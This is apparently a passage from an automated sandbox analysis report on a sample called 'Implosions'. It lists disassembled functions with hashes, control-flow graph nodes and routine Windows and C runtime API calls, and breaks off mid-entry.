              • Source File: 00000000.00000002.2910396162.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_21b0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e4cbef558d11e9f7c06a41c529fac64005b91e0b9e051b1a57a980c32e95d68f
              • Instruction ID: f67f6409fecb0d72908990cd5f62956885103f219f3f119135c2086881dd8d52
              • Opcode Fuzzy Hash: e4cbef558d11e9f7c06a41c529fac64005b91e0b9e051b1a57a980c32e95d68f
              • Instruction Fuzzy Hash: 2E82EA34B402148FDB55DF64D898BADBBB6BF88300F5085A9E50A9B3A5DF30AD85CF50
              Function 05D626D0 Relevance: .9, Instructions: 868COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 89560a5911c12f8bffb51e7ffe11784a656638910e0397c48f5bb47be46b3f70
              • Instruction ID: 06b4fe2314b012fdf949bb5b53812db334951cd3a1f26896c6329e5fa749af79
              • Opcode Fuzzy Hash: 89560a5911c12f8bffb51e7ffe11784a656638910e0397c48f5bb47be46b3f70
              • Instruction Fuzzy Hash: FE622738B102048FDB14EF78C894A6E7BB6BF88715F25456AE9069B3A5DF31DC42CB41
              Function 05DEC53F Relevance: .8, Instructions: 821COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 515a39d62b3590acfaefc645ef6cd85841c61a01cbe37b9741f2628397ac9c23
              • Instruction ID: ff91d9962ade174f969712c817c2c6e17a68eaa8ed555e786c29aac100b8966d
              • Opcode Fuzzy Hash: 515a39d62b3590acfaefc645ef6cd85841c61a01cbe37b9741f2628397ac9c23
              • Instruction Fuzzy Hash: BD722830A103458FDB25EF78D4547AEBBB2BF88300F54855AE44AAB365DB34ED86CB50
              Function 05CA1288 Relevance: .8, Instructions: 805COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38e0c6442a0b777aa63c7f14d8a8159016cce386faf22c1f4f6072726196ed22
              • Instruction ID: 0b9224f792b95cc33569d6dacc380788b03138ad4be86804f3d50466f0bef4d4
              • Opcode Fuzzy Hash: 38e0c6442a0b777aa63c7f14d8a8159016cce386faf22c1f4f6072726196ed22
              • Instruction Fuzzy Hash: F6626E35B002069FDB14DF79C494AAEBBB2FF88314F148968E9069B365DB70EC45CB90
              Function 05D67D70 Relevance: .7, Instructions: 675COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3486e7872cbb48b713d5ecc03968516b30a6e0a5bc6dbee24bff651b270ae079
              • Instruction ID: 53503f0ee172932b31685a757601f8160c88741b617c525e6edf492ca5f263d6
              • Opcode Fuzzy Hash: 3486e7872cbb48b713d5ecc03968516b30a6e0a5bc6dbee24bff651b270ae079
              • Instruction Fuzzy Hash: 88424830B502059FCB58EB78D894A6DBBF6FF88300B648469E506DB3A5DF70EC458B90
              Function 05CA7F88 Relevance: .6, Instructions: 613COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dd2cbd73baa138661dc6ac543afc96e3c9c8bbda4a40168b4bcf3ff9b303b07c
              • Instruction ID: 94b18d6402305cc608236b2caaddaee0cd5849500fadfe316f5a3f9634f7cc93
              • Opcode Fuzzy Hash: dd2cbd73baa138661dc6ac543afc96e3c9c8bbda4a40168b4bcf3ff9b303b07c
              • Instruction Fuzzy Hash: FC229D31B003019FDB69AB78946872E7EE7BF84340F648869E946DB395EF34EC458B41
              Function 05CACD00 Relevance: .6, Instructions: 605COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c81c21bd4c04c90f3c2aa34d0ce83e25b97ac75af3e72c673646babc99acdec4
              • Instruction ID: deff4e4a71bb377fa4e52cce38798a381868ac230f0476886476888b38c2b38d
              • Opcode Fuzzy Hash: c81c21bd4c04c90f3c2aa34d0ce83e25b97ac75af3e72c673646babc99acdec4
              • Instruction Fuzzy Hash: FA22BB35B003059FC715AB799858A6EBFE6FF84204F148869E90ADB391DF34ED06CB90
              Function 05DECCF0 Relevance: .5, Instructions: 452COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e8a6658d651034b82c0d118430164f2a7894b8640060afb006b21965c3c9b3a4
              • Instruction ID: f600866769596f46dab4f04433fc3143871ca8db01488dd7b1b84699b851dac0
              • Opcode Fuzzy Hash: e8a6658d651034b82c0d118430164f2a7894b8640060afb006b21965c3c9b3a4
              • Instruction Fuzzy Hash: AE125930A103158FDB25EF68C854B9ABBB2FF84304F148599E849AB355DB71ED86CF90
              Function 05CA2D38 Relevance: .3, Instructions: 339COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ea51bc0e4790361430fdf6e644fc6d7ce6abd35780c363bfd1a43e436f67d93a
              • Instruction ID: 0f0483746830834191c621a514c07663f2e4c7daa562214bd5d55cbfbbaebe0d
              • Opcode Fuzzy Hash: ea51bc0e4790361430fdf6e644fc6d7ce6abd35780c363bfd1a43e436f67d93a
              • Instruction Fuzzy Hash: 9ED14B35A00216DFDB14CF69D594AAEBBF3FF88204B548868E8059B351DB74ED42CB90
              Function 05CE5968 Relevance: .3, Instructions: 327COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bb02a37f0892e68f21bf89c2ca822165ade1a9e2a4a0be9fc78da60bc2091b20
              • Instruction ID: 81d10b2a8d4efa9ed84f7c1d91bfe75cc9344cc35fb1c3201a309284262345de
              • Opcode Fuzzy Hash: bb02a37f0892e68f21bf89c2ca822165ade1a9e2a4a0be9fc78da60bc2091b20
              • Instruction Fuzzy Hash: 86C1AD70A003029FDB24EF75D994BAEB7A3FF84304F54DE28C5069B655DBB4E9848B90
              Function 05CA3270 Relevance: .3, Instructions: 268COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8994940bc89307a371aff5e1d55eb06b4af929f15015edafbb9797edf22a6db0
              • Instruction ID: 87721de119ed5218e9c0137889b3739642e49796c660b680a2099c55787adb4b
              • Opcode Fuzzy Hash: 8994940bc89307a371aff5e1d55eb06b4af929f15015edafbb9797edf22a6db0
              • Instruction Fuzzy Hash: BD91A231A002059FDB05DFB4D854AAEBFB6FF89344F148869E905DB365EB31D942CB50
              Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 156 40cbf7-40cc06 157 40cc08-40cc14 156->157 158 40cc2f 156->158 157->158 159 40cc16-40cc1d 157->159 160 40cc33-40cc3d call 40d534 158->160 159->158 161 40cc1f-40cc2d 159->161 164 40cc47-40cc4e call 41087e 160->164 165 40cc3f-40cc46 call 40cbb4 160->165 161->160 170 40cc50-40cc57 call 40cbb4 164->170 171 40cc58-40cc68 call 4129c9 call 411a15 164->171 165->164 170->171 178 40cc72-40cc82 GetCommandLineA call 412892 171->178 179 40cc6a-40cc71 call 40e79a 171->179 184 40cc87 call 4127d7 178->184 179->178 185 40cc8c-40cc8e 184->185 186 40cc90-40cc97 call 40e79a 185->186 187 40cc98-40cc9f call 41255f 185->187 186->187 192 40cca1-40cca8 call 40e79a 187->192 193 40cca9-40ccb3 call 40e859 187->193 192->193 198 40ccb5-40ccbb call 40e79a 193->198 199 40ccbc-40ccd3 call 4019f0 193->199 198->199 203 40ccd8-40cce2 199->203 204 40cce4-40cce5 call 40ea0a 203->204 205 40ccea-40cd2e call 40ea36 call 40e21d 203->205 204->205
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
              • String ID:
              • API String ID: 2598563909-0
              • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
              • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
              • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
              • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C
              Function 05CE44C8 Relevance: 9.0, Strings: 7, Instructions: 211COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 212 5ce44c8-5ce44d0 213 5ce450b 212->213 214 5ce44d2 212->214 215 5ce450f-5ce4537 213->215 218 5ce453d-5ce4549 215->218 219 5ce4774-5ce4789 215->219 223 5ce454f-5ce4584 218->223 224 5ce45dc-5ce45e8 218->224 219->215 225 5ce478f-5ce4796 219->225 223->224 238 5ce4586-5ce45b5 223->238 228 5ce45ee-5ce4623 224->228 229 5ce46d5-5ce46e1 224->229 228->229 243 5ce4629-5ce4658 228->243 229->219 234 5ce46e7-5ce471c 229->234 234->219 248 5ce471e-5ce474d 234->248 251 5ce45c7-5ce45d4 238->251 252 5ce45b7-5ce45bf 238->252 256 5ce466a-5ce46ae 243->256 257 5ce465a-5ce4662 243->257 262 5ce475f-5ce476c 248->262 263 5ce474f-5ce4757 248->263 251->224 252->251 268 5ce46c0-5ce46cd 256->268 269 5ce46b0-5ce46b8 256->269 257->256 262->219 263->262 268->229 269->268
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: \s^q$\s^q$\s^q$\s^q$\s^q$\s^q$\s^q
              • API String ID: 0-1705958294
              • Opcode ID: c1fb4469de408b870ad47d8ca0c7cfaee3ac6a49200d33c9a91ddac1f7017236
              • Instruction ID: df769d265293bae2e298dc331e76e31d5fa1cb1e2ddc5ee245506b9896778f8f
              • Opcode Fuzzy Hash: c1fb4469de408b870ad47d8ca0c7cfaee3ac6a49200d33c9a91ddac1f7017236
              • Instruction Fuzzy Hash: C7912634A00606DFCB14DF68C594AA9BBF2FF89704B5489A8E8499B765DB30FC45CF90
              Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 271 4018f0-4018fa 272 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 271->272 273 4018fc-401900 271->273 276 401940-401949 GetLastError 272->276 277 401996-40199a 272->277 278 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 276->278 279 40198d-40198f 276->279 278->279 279->277 280 401991 call 401030 279->280 280->277
              APIs
              • lstrlenA.KERNEL32(?), ref: 00401906
              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
              • GetLastError.KERNEL32 ref: 00401940
              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: ByteCharMultiWide$ErrorLastlstrlen
              • String ID:
              • API String ID: 3322701435-0
              • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
              • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
              • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
              • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
              Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 284 40af66-40af6e 285 40af7d-40af88 call 40b84d 284->285 288 40af70-40af7b call 40d2e3 285->288 289 40af8a-40af8b 285->289 288->285 292 40af8c-40af98 288->292 293 40afb3-40afca call 40af49 call 40cd39 292->293 294 40af9a-40afb2 call 40aefc call 40d2bd 292->294 294->293
              APIs
              • _malloc.LIBCMT ref: 0040AF80
                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
              • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
              • __CxxThrowException@8.LIBCMT ref: 0040AFC5
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
              • String ID:
              • API String ID: 1411284514-0
              • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
              • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
              • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
              • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
              Function 05D63E00 Relevance: 2.8, Strings: 2, Instructions: 307COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 303 5d63e00-5d63e1d 304 5d63f55-5d63f5e 303->304 305 5d63e23-5d63e27 303->305 308 5d63f60-5d63f66 304->308 309 5d63f68-5d63f9d 304->309 306 5d63fa4-5d63fd4 305->306 307 5d63e2d-5d63e31 305->307 311 5d63fdb-5d64039 306->311 310 5d63e37-5d63e3b 307->310 307->311 308->309 309->306 313 5d64040-5d64129 310->313 314 5d63e41-5d63e47 310->314 311->313 368 5d64130-5d641c7 313->368 369 5d6412b-5d6412f 313->369 314->313 317 5d63e4d-5d63e62 314->317 332 5d63e64-5d63e71 317->332 333 5d63e79-5d63e90 317->333 332->333 384 5d63e92 call 5d64336 333->384 385 5d63e92 call 5de5f43 333->385 386 5d63e92 call 5d64228 333->386 342 5d63e98-5d63ead call 5d64760 345 5d63eb3-5d63ec8 342->345 351 5d63ee7-5d63ef1 345->351 352 5d63eca-5d63ece 345->352 358 5d63ef3-5d63f36 351->358 359 5d63f3e-5d63f52 351->359 354 5d63ed0-5d63ed3 352->354 355 5d63edb-5d63ede 352->355 354->355 355->351 358->359 381 5d641d4-5d641d6 368->381 382 5d641c9-5d641d3 368->382 384->342 385->342 386->342
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq$(bq
              • API String ID: 0-4224401849
              • Opcode ID: ab81b9c1b11058052ba4f87954b2b3e50c3a083ee8c5db75a97be87fe28aefb4
              • Instruction ID: c1cc21ce5a48dd9e7df742ca0fb9f306195be306964fcc12fd0cb5ce31d177c7
              • Opcode Fuzzy Hash: ab81b9c1b11058052ba4f87954b2b3e50c3a083ee8c5db75a97be87fe28aefb4
              • Instruction Fuzzy Hash: E5B15B30B102059FCB49AF78D46866E7BE6FF89340F64456AE50ADB394DE34DC06CBA1
              Function 05DEAA60 Relevance: 2.8, Strings: 2, Instructions: 281COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 388 5deaa60-5deaaac 391 5deaaae-5deaac6 388->391 392 5deaac9-5deaae3 388->392 397 5deab36-5deab46 392->397 398 5deaae5-5deab11 392->398 401 5deab48-5deab5e 397->401 402 5deab60-5deab78 397->402 416 5deab1a 398->416 417 5deab13-5deab18 398->417 403 5deabdb-5deabe1 401->403 409 5deab80-5deab85 402->409 406 5deabf9-5deac11 403->406 407 5deabe3-5deabf1 403->407 407->406 411 5deab8b-5deab98 409->411 412 5deac14-5deac1b 409->412 425 5deab9a-5deab9f 411->425 426 5deaba1-5deabae 411->426 414 5deac9e-5deaca7 412->414 415 5deac21-5deac2a 412->415 422 5deaca9-5deacaf 414->422 423 5deacb1-5dead59 414->423 420 5deac2c-5deac32 415->420 421 5deac34-5deac97 415->421 419 5deab1f-5deab31 416->419 417->419 419->403 420->421 421->414 422->423 454 5dead5b 423->454 455 5dead60-5dead79 423->455 431 5deabcf-5deabd8 425->431 433 5deabb4-5deabc1 426->433 434 5deabb0-5deabb2 426->434 431->403 440 5deabca 433->440 441 5deabc3-5deabc8 433->441 434->431 440->431 441->431 454->455 458 5dead7b-5dead81 455->458 459 5deadb1-5deadd7 455->459 460 5deadd9 458->460 461 5dead83-5deadaf 458->461 462 5deadde-5deade4 459->462 460->462 461->462 463 5deadee-5deae0f 462->463 464 5deade6 462->464 469 5deadad-5deadd7 463->469 470 5deae11-5deae1b 463->470 464->463 469->462
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q
              • API String ID: 0-2697143702
              • Opcode ID: 33b1d66952abe1a1c55a569f67149ea1eb698e3a385c3a7a826f38d7614aa564
              • Instruction ID: 8466702b38c0b5f1907baf7dd3bf0cd61cb55ffa51d7290ca53f6a5278792ca3
              • Opcode Fuzzy Hash: 33b1d66952abe1a1c55a569f67149ea1eb698e3a385c3a7a826f38d7614aa564
              • Instruction Fuzzy Hash: 2BA14A30B042069FCB14EFA9D9586AEBBF6BF88301F14446AE506EB355DB34D946CB90
              Function 05CAE248 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 471 5cae248-5cae257 472 5cae259-5cae25b 471->472 473 5cae2b3-5cae2bc 471->473 476 5cae302-5cae30b 472->476 477 5cae261-5cae277 472->477 474 5cae2be-5cae2c4 473->474 475 5cae2c6-5cae2fb 473->475 474->475 475->476 478 5cae30d-5cae313 476->478 479 5cae315-5cae372 476->479 488 5cae279 477->488 489 5cae294-5cae2b0 477->489 478->479 498 5cae378-5cae382 479->498 499 5cae374-5cae377 479->499 493 5cae283-5cae28d 488->493 493->489 500 5cae38d-5cae3e3 498->500 501 5cae384-5cae38a 498->501 501->500
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq$(bq
              • API String ID: 0-4224401849
              • Opcode ID: 751b55a4d0f8a6d39272e4465cc28d0d47dac3be7c3c0d8aeae6e1e5bbe2fcf1
              • Instruction ID: bdad8f4f42ded95e2ee460af3d2d6351d5d57766a2433b168cd5361b05c4b6d3
              • Opcode Fuzzy Hash: 751b55a4d0f8a6d39272e4465cc28d0d47dac3be7c3c0d8aeae6e1e5bbe2fcf1
              • Instruction Fuzzy Hash: 3841E231B05341AFD715AB78946572E7FE6AFC5200F6449A9E906DB381EF30EC068791
              Function 05DEDA8B Relevance: 2.6, Strings: 2, Instructions: 120COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 509 5deda8b-5dedaa9 510 5dedaab-5dedaad 509->510 511 5dedb01-5dedb0a 509->511 514 5dedab3-5dedaef 510->514 515 5dedb50-5dedb59 510->515 512 5dedb0c-5dedb12 511->512 513 5dedb14-5dedb49 511->513 512->513 513->515 569 5dedaf1 call 5deda8b 514->569 570 5dedaf1 call 5dedcb0 514->570 571 5dedaf1 call 5dedbb0 514->571 516 5dedb5b-5dedb61 515->516 517 5dedb63-5dedbc9 515->517 516->517 536 5dedbcb-5dedbcd 517->536 537 5dedbf8-5dedc01 517->537 535 5dedaf7-5dedafe 538 5dedc75-5dedc7e 536->538 539 5dedbd3-5dedbf5 536->539 540 5dedc0b-5dedc6e 537->540 541 5dedc03-5dedc09 537->541 542 5dedc88-5dedcdf 538->542 543 5dedc80-5dedc86 538->543 540->538 541->540 557 5dedd0f-5dedd11 542->557 558 5dedce1-5dedce3 542->558 543->542 559 5dedd26-5dedd2a 557->559 560 5dedd13-5dedd20 call 5dede28 557->560 562 5dedcf6-5dedd0c 558->562 563 5dedce5-5dedcf3 558->563 560->559 569->535 570->535 571->535
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq$(bq
              • API String ID: 0-4224401849
              • Opcode ID: d31ea2100260228ad2bd1d45ffca555eb6b2e594cb04aeec98856a187917fbb8
              • Instruction ID: 875e0d1381a5e9e864e23d5a64589039c9e9007bbff6308e2852c928f8e7b0f7
              • Opcode Fuzzy Hash: d31ea2100260228ad2bd1d45ffca555eb6b2e594cb04aeec98856a187917fbb8
              • Instruction Fuzzy Hash: 5531A031B043016FD725AB69A85576ABBE7EFC4351F58892AE506DB384EF30EC058B90
              Function 05CA7770 Relevance: 1.9, Strings: 1, Instructions: 649COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: ,7bq
              • API String ID: 0-2588767232
              • Opcode ID: 163f03fb42d716bab88336191a006eea6aebda957ac8033336405942a7d2f964
              • Instruction ID: 474c6dff1d7de4eadbf1cbf465d5db22eda3b86e1dc32caeee9692b830bf0117
              • Opcode Fuzzy Hash: 163f03fb42d716bab88336191a006eea6aebda957ac8033336405942a7d2f964
              • Instruction Fuzzy Hash: ED328171B102059BCB19ABB8C89467EBBF3FFC8600B644869E512DB385DF75DD028B91
              Function 021B10A8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
              Download Yara Rule
              APIs
              • GetConsoleWindow.KERNELBASE ref: 021B110F
              Memory Dump Source
              • Source File: 00000000.00000002.2910396162.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_21b0000_Implosions.jbxd
              Similarity
              • API ID: ConsoleWindow
              • String ID:
              • API String ID: 2863861424-0
              • Opcode ID: db91b59b8ddce125ec024634c24684aa0b0894c2f317d61b74e16cae9df6b6ae
              • Instruction ID: ba8046f0e1c84ac2e7671d22bba813cde0aef5b01e8285a4c8578403541799ed
              • Opcode Fuzzy Hash: db91b59b8ddce125ec024634c24684aa0b0894c2f317d61b74e16cae9df6b6ae
              • Instruction Fuzzy Hash: 6A1125B59002498FDB20DFAAC5457DFFBF4AF88324F20841AD459A7240DB39A544CF95
              Function 021B10B0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
              Download Yara Rule
              APIs
              • GetConsoleWindow.KERNELBASE ref: 021B110F
              Memory Dump Source
              • Source File: 00000000.00000002.2910396162.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_21b0000_Implosions.jbxd
              Similarity
              • API ID: ConsoleWindow
              • String ID:
              • API String ID: 2863861424-0
              • Opcode ID: 920aa732019befa1a08d8079a109425f07f381a56abc41377b1d548e214ff8b7
              • Instruction ID: d91626739a89291528362898d3d00da02e37668bd0b1c0bb4a034935fe5cac6c
              • Opcode Fuzzy Hash: 920aa732019befa1a08d8079a109425f07f381a56abc41377b1d548e214ff8b7
              • Instruction Fuzzy Hash: BF1106B59002498FDB20DFAAC5457DEFBF4EF48324F208419C459A7250DB79A544CF95
              Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
              • SysAllocString.OLEAUT32 ref: 00401898
              Memory Dump Source
